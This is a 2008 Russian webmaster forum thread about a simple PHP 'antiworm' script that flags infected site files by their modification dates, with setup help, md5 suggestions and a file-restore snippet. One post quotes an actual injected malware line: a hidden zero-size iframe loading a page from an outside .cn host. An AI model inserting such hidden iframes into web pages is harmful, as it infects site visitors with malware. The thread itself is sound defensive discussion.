Старый 13.09.2008, 13:29   #11
Дикий
 
Аватар для D.iK.iJ
 
Регистрация: 02.06.2007
Адрес: <Noindex>
Сообщений: 2,543
Вес репутации: 308
D.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущее
По умолчанию

Буду ждать результатов
Вроде бы PHP скрипт достаточно простой...
D.iK.iJ вне форума   Ответить с цитированием
Старый 15.09.2008, 09:42   #12
Специалист
 
Регистрация: 21.11.2007
Сообщений: 298
Вес репутации: 0
Dima1151 не любят в этих краях
По умолчанию

удалить

Добавлено через 13 минут
НЕТ /index.php
NO
OK
OK
OK
OK
НЕТ /go.php
NO
OK
OK
OK
OK

/index.php
|01.01.70|
|15.09.08|
|15.09.08|
|15.09.08|
|15.09.08|
/go.php
|01.01.70|
|15.09.08|
|15.09.08|
|15.09.08|
|15.09.08|

Откуда берется |01.01.70|
Почему пишет НЕТ /**.php
И вообще что он проверяет я не пойму... скрипт расположден в папке /antiworm/
он проверяет корневой каталог?

Последний раз редактировалось Dima1151; 15.09.2008 в 09:42. Причина: Добавлено сообщение
Dima1151 вне форума   Ответить с цитированием
Старый 15.09.2008, 10:04   #13
шайтанама
 
Аватар для shadx
 
Регистрация: 13.07.2007
Сообщений: 1,699
Вес репутации: 251
shadx - прекрасное будущееshadx - прекрасное будущееshadx - прекрасное будущееshadx - прекрасное будущееshadx - прекрасное будущееshadx - прекрасное будущееshadx - прекрасное будущееshadx - прекрасное будущееshadx - прекрасное будущееshadx - прекрасное будущееshadx - прекрасное будущее
Отправить сообщение для shadx с помощью ICQ
По умолчанию

можете скинуть пару примеров, зараженных участков кода.
Я вечером - ночью напишу скрипт
Идея есть интересная )))
Просто у мну уже давно сайты не заражаются
shadx вне форума   Ответить с цитированием
Старый 15.09.2008, 10:08   #14
Специалист
 
Регистрация: 21.11.2007
Сообщений: 298
Вес репутации: 0
Dima1151 не любят в этих краях
По умолчанию

Цитата:
Сообщение от shadx Посмотреть сообщение
можете скинуть пару примеров, зараженных участков кода.
<iframe src="http://orentraff.cn/in.cgi?8" width="0" height="0" style="display:none"></iframe>

Задолбало это
Dima1151 вне форума   Ответить с цитированием
Старый 15.09.2008, 13:51   #15
Дикий
 
Аватар для D.iK.iJ
 
Регистрация: 02.06.2007
Адрес: <Noindex>
Сообщений: 2,543
Вес репутации: 308
D.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущее
Post

Цитата:
Сообщение от Dima1151 Посмотреть сообщение
Откуда берется |01.01.70|
Почему пишет НЕТ /**.php
И вообще что он проверяет я не пойму... скрипт расположден в папке /antiworm/
он проверяет корневой каталог?
Давайте начнем с самого начала.
В папке /antiworm/ есть файл config.dat, который нужно открыть в Блокноте.
В файле вот такие пять строк:
Цитата:
/index.php|01.01.70|
/index.html|01.01.70|
/index.htm|01.01.70|
/index.xhtml|01.01.70|
(тут - пустая строка)
Это - база страниц, по которой скрипт будет проверять дату изменения этих самых страниц.
Пока в базу занесен просто шаблон - проверка нескольких возможных индексных файлов в корне. А так как синхронизация еще не проводилась и дата изменения ваших файлов не известна, то вместо нее записано |01.01.70| - первое января 70 года

Соответственно, чтобы скрипт начал проверять Ваши файлы, измените список на свой. Пример:
Цитата:
/index.php|01.01.70|
/admin/index.html|01.01.70|
/sape/******/index.php|01.01.70|
/antiworm/avto.php|01.01.70|
(тут - пустая строка)
После того, как нажмете на кнопочку синхронизации, вместо |01.01.70| в базу будет записана реальная дата изменения того или иного файла.
Соответственно, если файл вдруг изменится без вашего ведома - велика вероятность, что это сделал вирус.

Немного по сообщениям:
НЕТ - файла нет
OK - дата изменения совпадает с хранящейся в базе
NO - дата изменения файла не совпадает с базой.

Кнопка синхронизации служит для того, чтобы обновить даты в базе. Например, после того, как вы сами изменили какой-то файл.
Кнопки ON и OFF, думаю, интуитивно понятны.
D.iK.iJ вне форума   Ответить с цитированием
Старый 15.09.2008, 16:17   #16
Специалист
 
Регистрация: 21.11.2007
Сообщений: 298
Вес репутации: 0
Dima1151 не любят в этих краях
По умолчанию

D.iK.iJ
Спасибо, теперь всё работает

Добавлено через 6 минут
А проверка по времени файла нет? По дате файла не очень... время нужно... Вот проверка по md5 другое дело или crc32 ... да и каталоги бы проверял на появление новых файлов... можно?

Добавлено через 1 час 9 минут
Если какие то файлы из папки не прописаны нужно чтоб скрипт выдавал "неизввестный файл" и все файлы нужно проверять по md5... ща в этом скрипте толку очень мало Имхо...

Последний раз редактировалось Dima1151; 15.09.2008 в 16:17. Причина: Добавлено сообщение
Dima1151 вне форума   Ответить с цитированием
Старый 15.09.2008, 16:19   #17
Старый зулус
 
Аватар для slavs™
 
Регистрация: 18.02.2008
Адрес: КваЗулу-Наталь
Сообщений: 1,648
Вес репутации: 291
slavs™ - прекрасное будущееslavs™ - прекрасное будущееslavs™ - прекрасное будущееslavs™ - прекрасное будущееslavs™ - прекрасное будущееslavs™ - прекрасное будущееslavs™ - прекрасное будущееslavs™ - прекрасное будущееslavs™ - прекрасное будущееslavs™ - прекрасное будущееslavs™ - прекрасное будущее
По умолчанию

Цитата:
Сообщение от Dima1151 Посмотреть сообщение
D.iK.iJ
Спасибо, теперь всё работает

Добавлено через 6 минут
А проверка по времени файла нет? По дате файла не очень... время нужно... Вот проверка по md5 другое дело или crc32 ... да и каталоги бы проверял на появление новых файлов... можно?

Добавлено через 1 час 9 минут
Если какие то файлы из папки не прописаны нужно чтоб скрипт выдавал "неизввестный файл" и все файлы нужно проверять по md5... ща в этом скрипте толку очень мало Имхо...
У скрипта совершенно другое предназначение. Он просто должен сообщить о вторжении и все.
slavs™ вне форума   Ответить с цитированием
Старый 15.09.2008, 17:13   #18
Дикий
 
Аватар для D.iK.iJ
 
Регистрация: 02.06.2007
Адрес: <Noindex>
Сообщений: 2,543
Вес репутации: 308
D.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущее
По умолчанию

Цитата:
Сообщение от slavs™ Посмотреть сообщение
У скрипта совершенно другое предназначение. Он просто должен сообщить о вторжении и все.
Действительно.
Когда пароли крали у меня, я в первую очередь жалел, что не сразу заметил приписку к коду в виде виря. (Хотя банально изменили только index.php.) И кто-то из зашедших на сайт пользователей мог подхватить на свой комп тот же вирус

А чтобы файл проверялся не только на дату, но и на время создания, думаю, нужно просто изменить:

$add=date("d.m.y",filemtime($_SERVER['DOCUMENT_ROOT']. "$dt[0]"));
$nastdate=date("d.m.y");


И подобные строки на то, что нужно именно вам
D.iK.iJ вне форума   Ответить с цитированием
Старый 22.10.2008, 12:28   #19
Дикий
 
Аватар для D.iK.iJ
 
Регистрация: 02.06.2007
Адрес: <Noindex>
Сообщений: 2,543
Вес репутации: 308
D.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущее
По умолчанию

АП!
D.iK.iJ вне форума   Ответить с цитированием
Старый 23.10.2008, 13:25   #20
Мастер
 
Аватар для DNA
 
Регистрация: 23.09.2008
Адрес: СССР
Сообщений: 683
Вес репутации: 182
DNA - прекрасное будущееDNA - прекрасное будущееDNA - прекрасное будущееDNA - прекрасное будущееDNA - прекрасное будущееDNA - прекрасное будущееDNA - прекрасное будущееDNA - прекрасное будущееDNA - прекрасное будущееDNA - прекрасное будущееDNA - прекрасное будущее
Отправить сообщение для DNA с помощью ICQ
По умолчанию

PHP код:
if(filesize('file.php')!=$filesize)
{
    @
copy('bpath/file-dist.php''file.php');

DNA вне форума   Ответить с цитированием
Ответ

Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
А зачем у вновь добавляемых площадок "по умолчанию" стоит "скрывать УРЛ"? Ковалев Вопросы по работе системы 6 15.12.2008 12:02
Уберите, плиз, "Новости SAPE.RU" и "Дайджест блогов" из шапки форума Edward Курилка 36 27.08.2008 20:53
Скрипт "Антикритинизм" - будут ли проблемы с сапой? Root Вопросы по работе системы 14 21.05.2008 06:09
Сломалась опция - "Показать все страницы каждого сайта" ? shtill Ошибки при работе с системой 1 30.03.2008 23:54
Как внутри акаунта перевести деньги заработанные "вебмастером" на счёт "оптимизатора" kapa Вопросы от новичков 10 11.01.2008 17:45


Часовой пояс GMT +3, время: 05:26.